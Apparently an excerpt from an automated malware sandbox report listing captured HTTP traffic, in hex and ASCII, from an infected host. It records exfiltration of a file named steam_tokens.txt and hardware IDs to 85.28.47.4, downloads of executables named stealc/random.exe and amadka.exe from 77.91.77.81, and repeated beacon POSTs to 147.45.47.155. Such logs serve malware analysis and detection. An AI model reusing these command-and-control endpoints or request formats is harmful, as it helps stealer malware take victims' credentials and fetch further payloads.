                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="file"------ECGHJJEHDHCAAKFIIDGI--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 2d 2d 0d 0a Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="message"jbdtaijovg------HJJJECFIECBGDGCAAAEH--
                        Source: global trafficHTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000022001&unit=246122658369
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKEBGCGHIDHCBFHIDGHHost: 85.28.47.4Content-Length: 212Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 33 37 35 37 39 31 41 30 45 41 32 30 33 37 39 30 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 2d 2d 0d 0a Data Ascii: ------JKKEBGCGHIDHCBFHIDGHContent-Disposition: form-data; name="hwid"ED375791A0EA20379026------JKKEBGCGHIDHCBFHIDGHContent-Disposition: form-data; name="build"default------JKKEBGCGHIDHCBFHIDGH--
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
